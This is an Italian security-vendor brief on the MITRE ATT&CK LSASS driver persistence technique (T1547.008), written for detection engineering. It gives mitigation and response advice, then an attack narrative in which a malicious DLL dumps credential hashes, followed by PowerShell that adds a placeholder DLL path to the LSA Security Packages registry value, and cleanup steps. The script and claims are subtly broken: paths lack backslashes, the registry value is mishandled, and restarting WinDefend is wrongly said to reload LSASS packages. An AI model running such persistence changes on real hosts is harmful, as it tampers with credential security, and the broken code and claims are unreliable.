SOC Prime Bias: Critico

30 Mar 2026 16:15
newspaper icon picussecurity.com

T1547.008 Driver LSASS in MITRE ATT&CK Spiegato

Author Photo
Ruslan Mikhalov Capo della Ricerca sulle Minacce presso SOC Prime linkedin icon Segui
T1547.008 Driver LSASS in MITRE ATT&CK Spiegato
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Sommario

L’articolo spiega la sotto-tecnica di persistenza del driver LSASS, T1547.008, che gli attori delle minacce usano per ottenere un’esecuzione duratura e privilegiata sui sistemi Windows sfruttando come LSASS carica i componenti relativi alla sicurezza.

Indagine

Gli aggressori tipicamente iniziano ottenendo privilegi di SISTEMA, poi piazzano una DLL o un driver dannoso sull’host target e alterano le chiavi di registro all’interno della configurazione LSA in modo che LSASS carichi il componente malevolo durante l’avvio. In alcuni casi, lo stesso approccio può essere esteso per abusare dei punti di estensione del servizio del Domain Controller.

Mitigazione

I difensori dovrebbero monitorare i cambiamenti nel registro che influenzano le chiavi LSA, richiedere una firma rigorosa del codice per driver e DLL, limitare i permessi di scrittura sui percorsi del registro pertinenti e applicare il monitoraggio dell’integrità ai componenti caricati dal processo LSASS.

Risposta

Se vengono rilevati cambiamenti sospetti nel registro o caricamenti inaspettati di driver in lsass.exe isolare l’host, catturare la memoria di LSASS per un’analisi focalizzata sulle credenziali e ripristinare i valori del registro modificati a uno stato noto come buono mentre si indaga sul processo padre responsabile.

Flusso di Attacco

Stiamo ancora aggiornando questa parte. Iscriviti per essere notificato

Notificami

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-volo su Telemetria e Baseline deve essere superato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.

  • Narrazione & Comandi d’Attacco:

    1. Preparazione – rilascio DLL dannosa – L’avversario crea una DLL (maliciousLSASS.dll) che, quando caricata da LSASS, estrae gli hash delle credenziali e li scrive in %TEMP%. La DLL è posizionata sulla workstation della vittima.
    2. Persistenza tramite Modifica del Registro – Usando il nativo reg.exe, l’attaccante aggiunge il percorso completo della DLL dannosa al valore multi-stringa Security Packages , che LSASS legge durante l’avvio del servizio.
    3. Attivazione – L’attaccante forza LSASS a ricaricare i pacchetti riavviando il servizio LSASS (riavvio del sistema richiesto; per il test simuliamo arrestando e avviando il WinDefend servizio che forza LSASS a ricaricare la lista dei pacchetti di sicurezza).

  • Script di Test per la Regressione:

    # -------------------------------------------------
# Simula la persistenza del driver LSASS (T1547.008)
# -------------------------------------------------
$dllPath = "$env:USERPROFILEDesktopmaliciousLSASS.dll"
# Assicurati che esista un file DLL di test (segnaposto vuoto per il test)
if (-not (Test-Path $dllPath)) {
    New-Item -Path $dllPath -ItemType File -Force | Out-Null
}

# Backup del valore originale
$regPath = 'HKLM:SYSTEMCurrentControlSetControlLsaSecurity Packages'
$original = (Get-ItemProperty -Path $regPath -Name '(Default)' -ErrorAction SilentlyContinue).'(Default)'

# Aggiungi il percorso della DLL dannosa
$newValue = @()
if ($original) { $newValue = $original -split "`0" }
$newValue += $dllPath
Set-ItemProperty -Path $regPath -Name '(Default)' -Value $newValue -Force

Write-Host "[+] Modificato il valore del registro Security Packages per includere la DLL dannosa."

# Opzionale: Forza LSASS a ricaricare i pacchetti senza riavvio (riavvia servizio dipendente)
Restart-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
Write-Host "[+] Richiesto riavvio del servizio per provocare ricaricamento di LSASS."

# Pausa per consentire la raccolta dei log
Start-Sleep -Seconds 10

# Ripristina il valore originale (fase di pulizia eseguita separatamente)

  • Comandi di Pulizia:

    # -------------------------------------------------
# Pulizia dopo la simulazione
# -------------------------------------------------
$regPath = 'HKLM:SYSTEMCurrentControlSetControlLsaSecurity Packages'
# Ripristina il valore multi-stringa originale catturato in precedenza (se presente)
if ($original) {
    Set-ItemProperty -Path $regPath -Name '(Default)' -Value $original -Force
} else {
    # Rimuovi l'intero valore se originariamente vuoto
    Remove-ItemProperty -Path $regPath -Name '(Default)' -Force -ErrorAction SilentlyContinue
}
Write-Host "[+] Ripristinato il valore del registro Security Packages originale."

# Rimuovi la DLL di test
Remove-Item -Path "$env:USERPROFILEDesktopmaliciousLSASS.dll" -Force -ErrorAction SilentlyContinue
Write-Host "[+] Cancellata la DLL dannosa temporanea."

# Opzionale: Riavvia l'host per resettare completamente lo stato di LSASS (non richiesto per il test)
# Restart-Computer -Force

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis